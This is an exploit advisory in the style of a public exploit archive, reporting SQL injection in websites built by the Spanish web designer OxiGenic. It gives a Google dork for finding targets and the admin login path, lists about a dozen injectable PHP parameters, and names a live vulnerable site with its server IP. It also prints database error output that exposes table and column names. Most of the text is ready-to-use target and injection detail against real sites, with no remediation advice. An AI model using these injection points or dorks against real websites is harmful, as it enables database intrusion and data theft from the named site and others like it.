####################################################################
# Exploit Title : Desarrollado por OxiGenic Web Design Spain SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/01/2019
# Vendor Homepage : oxigenic.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desarrollado por OXIGENIC''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
####################################################################
# Admin Panel Login Path :
*************************
/admin
# SQL Injection Exploit :
***********************
/notificacion.php?id=[SQL Injection]
/noticias.php?id=[SQL Injection]
/fotogal_cp.php?id=[SQL Injection]
/fotocp.php?id=[SQL Injection]
/pesca.php?id=[SQL Injection]
/fotocp.php?id=[SQL Injection]
/printentrevista.php?id=[SQL Injection]
/acto.php?id=[SQL Injection]
/asoc.php?id=[SQL Injection]
/cazal.php?sec=[SQL Injection]
/asocl.php?sec=[SQL Injection]
/fotoacto.php?id=[SQL Injection]
####################################################################
# Example Vulnerable Site :
*************************
[+] bardenasreales.es/notificacion.php?id=41%27 =>
[ Proof of Concept ] => archive.is/fpP4F
Note : (149.202.228.232) => There are 403 domains hosted on this server.
####################################################################
# SQL Database Error :
**********************
Database error: Invalid SQL: SELECT articulos.id AS id, fecha, tema,
titulo, subtitulo, texto, foto1, foto1_m, foto2, foto2_p, foto3, foto3_p, foto4,
foto4_p, foto5, foto5_p, foto6, foto6_p, pie1, pie2, pie3, pie4, pie5, pie6, informa,
fotosde, notrelacionada1, notrelacionada2, notrelacionada3, enlace1, url1, enlace2, url2,
enlace3, url3, fuente, urlfuente FROM articulos,temas WHERE
articulos.activo='1' AND temas.id=articulos.tema AND temas.activo='1' AND articulos.id='126''
MySQL Error: 1064 (You have an error in your SQL syntax; check the
manual that corresponds to your MariaDB server version for the
right syntax to use near ''126''' at line 41)
Session halted.
Database error: Invalid SQL: SELECT id, fecha, titulo, texto, informa, foto1
FROM notificaciones WHERE id='41'' AND activo='1'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the
right syntax to use near '1'' at line 8)
Session halted.
Database error: Invalid SQL: SELECT foto, pie
FROM galerias_cp WHERE id='113'' AND activo='1'
MySQL Error: 1064 (You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server
version for the right syntax to use near '1'' at line 4)
Session halted.
Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo, subtitulo,
texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3, foto4,
foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat, cazapescasubcat.nombre
AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE cazapesca.activo='1'
AND cazapescasubcat.id=cazapesca.idsubcat AND cazapescasubcat.idcat='2'
AND cazapescasubcat.activo='1' AND cazapesca.id='26''
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that
corresponds to your MariaDB server version for the right syntax to use near ''26''' at line 32)
Session halted.
Database error: Invalid SQL: SELECT foto as foto, pie as pie FROM
cazapesca WHERE id='266'' AND activo='1'
MySQL Error: 1064 (You have an error in your SQL syntax; check the
manual that corresponds to your MariaDB server version for the right
syntax to use near '1'' at line 4)
Session halted.
Database error: Invalid SQL: SELECT * FROM entrevistas WHERE id='6''
AND activo='1'
MySQL Error: 1064 (You have an error in your SQL syntax; check the
manual that corresponds to your MariaDB server version for the
right syntax to use near '1'' at line 3)
Session halted.
Database error: Invalid SQL: SELECT cazapesca.id AS id, fecha, titulo,
subtitulo, texto, foto1, foto1_p, pie1, foto2, foto2_p, pie2, foto3, foto3_p, pie3,
foto4, foto4_p, pie4, foto5, foto5_p, pie5, foto6, foto6_p, pie6, idsubcat,
cazapescasubcat.nombre AS subsec, idcat FROM cazapesca, cazapescasubcat WHERE
cazapesca.activo='1' AND cazapescasubcat.id=cazapesca.idsubcat AND
cazapescasubcat.idcat='3' AND cazapescasubcat.activo='1' AND cazapesca.id='156''
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near ''156''' at line 32)
Session halted.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################